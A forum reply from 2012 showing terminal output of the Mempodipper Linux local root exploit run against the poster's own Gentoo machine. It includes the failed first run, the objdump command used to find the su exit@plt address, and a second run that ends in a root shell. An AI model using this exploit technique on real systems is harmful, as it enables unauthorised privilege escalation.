« Reply #1 : January 24, 2012, 10:47:41 am »
Proof on localhost
---
Though the exploit had to be "helped" along

pascal@0day ~ $ cpp/./exp_proc
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/31340/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: cpp/./exp_proc -o ADDRESS
[-] Example: cpp/./exp_proc -o 0x402178
pascal@0day ~ $ su
Password:
0day pascal # objdump -d /bin/su | grep 'exit@plt' | tail -1 | awk '{print $8}'
402100
0day pascal # exit
pascal@0day ~ $ cpp/./exp_proc -o 0x402100
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/31389/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x4020f4.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),16(cron),18(audio),19(cdrom),27(video),100(users)
sh-4.1# uname -srm
Linux 3.2.0-gentoo x86_64
« Last edit: January 24, 2012, 10:58:20 am by Pascal »

cout << "Shalom World!\n"; // (с)